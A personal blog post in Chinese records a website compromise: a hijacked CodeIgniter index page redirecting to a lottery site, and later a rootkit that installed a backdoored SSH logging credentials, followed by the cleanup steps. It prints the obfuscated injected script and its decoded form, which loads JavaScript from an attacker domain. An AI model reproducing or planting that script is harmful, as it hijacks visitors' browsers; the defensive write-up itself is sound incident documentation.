06月08, 2018

记一次网站被挂马追踪到的Rootkit病毒事件

网站安全向来是不容忽视的问题,我本人也一直注意网站的安全防护工作,本文主要记录一下我维护的一个网站被挂马后的问题追踪及解决过程。

1、前期处理工作

因为是负责维护,所以网站一直有做存活监测,首先介绍下服务器及网站基本情况:

  • 服务器系统:CentOS release 6.9 (Final)
  • PHP:版本5.2.17
  • MySQL:版本5.1.71
  • Web框架:CodeIgniter(版本2.1.3,以下简称CI)
  • Web服务器:Nginx(版本1.0.15)
  • 服务管理工具:LuManager(版本2.0,集成了上述Nginx、PHP、MySQL等工具)

①、出现与网站业务无关的黄色、彩票等独立的广告页面

发现这些页面都是.svn路径下,所以处理方案就是在Nginx配置文件中加入对.svn路径的屏蔽,同时删除已经存在的广告页面文件,发生以上事件时,没有太过注意,以为不会有其他事情了

②、发现首页被重定向至"大地彩票"官网

安静了几个月之后,有一天突然被告知打开官网时会直接跳转至彩票官网,找到CI框架入口文件,发现入口文件被篡改,index.php文件中的PHP程序被改为HTML程序,而且在HTML中找到一段<script>,内容如下:

<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('j["\\7\\e\\1\\l\\i\\9\\m\\0"]["\\8\\5\\a\\0\\9"](\'\\g\\2\\1\\5\\a\\3\\0 \\0\\k\\3\\9\\d\\6\\0\\9\\q\\0\\4\\f\\b\\r\\b\\2\\1\\5\\a\\3\\0\\6 \\2\\5\\1\\d\\6\\p\\0\\0\\3\\2\\n\\4\\4\\8\\8\\8\\c\\1\\3\\7\\b\\2\\o\\c\\1\\e\\i\\4\\7\\7\\c\\f\\2\\6\\h\\g\\4\\2\\1\\5\\a\\3\\0\\h\');',28,28,'x74|x63|x73|x70|x2f|x72|x22|x64|x77|x65|x69|x61|x2e|x3d|x6f|x6a|x3c|x3e|x6d|window|x79|x75|x6e|x3a|x38|x68|x78|x76'.split('|'),0,{}))
</script>

通过解密和解码,得到以下内容:

window["document"]["write"]('<script type="text/javascript" src="https://www.cpdas8.com/dd.js"></script>');

现在一目了然了,被注入了dd.js之后就会强制跳转至https://www.dddas8tz.com,接下来就是解决问题了

2、使用第三方工具查找问题并修复漏洞

使用的第三方Web安全工具:

①、 百度站长工具 查找到的问题大概有以下几点:

  • I、Nginx版本过低
  • II、MySQL版本过低
  • III、PHP版本过低
  • IV、其它问题

②、360网站安全 查找到的问题如下:

  • I、有注入风险
  • II、文件夹权限异常
  • III、其它问题

综上,百度找到的基本都是软件版本导致的漏洞问题,360找到的基本都是网站代码本身的问题,基于这些问题,服务器做了框架升级、代码漏洞修复、弱口令更改等操作

3、找到Rootkit病毒

修复漏洞之后很长时间内都没有再出去被挂马现象,但是好景不长,同样的问题又出现了,在代码级软件级的漏洞修复完成之后还出现问题,我怀疑是系统级的木马/漏洞引起的,所以这次使用了安全狗,使用安全狗之后,第一次扫描就找到了本文提及的Rootkit病毒,Rootkit病毒是利用系统漏洞,安装了带有后门的程序,本次病毒是安装了带有后门的SSH,下面主要记录一下这次病毒的实际表现

①、查看SSH版本:

ssh -V

得到结果如下: ssh-V

结果显示,SSH版本异常,由于SSH带有后门,所以连带的其它几个软件都出现异常,如rpm、lsattr、chattr

②、查看SSH程序:

sshlist

如图所示,这里有几个被感染了的ssh程序,另外该次病毒还将每次通过SSH登录的用户名和密码都记录了下来

③、查看“/usr/include/netda.h”文件

cat /usr/include/netda.h

得到结果如下:

pwdlist

找到问题所在,接下来就是要解决病毒了

4、解决病毒

①、重新安装软件

重新安装SSH、rpm、lsattr、chattr

②、删除感染的SSH程序

③、删除“netda.h”

④、更改用户密码

解决完成之后到目前为止都没有再出现问题,据推测,这次问题是因为弱口令导致服务器被入侵,然后被安装了带有后门的SSH程序进而整个服务器都被控制。

经过这次事件之后,也给我自己提了个醒,服务器安全和网站安全一定要当做重中之重,而且密码都不要使用弱口令,避免遭雷。

有任何问题,欢迎在文章下方留言。

本文链接:https://www.shaobin.wang/post/32.html

Comments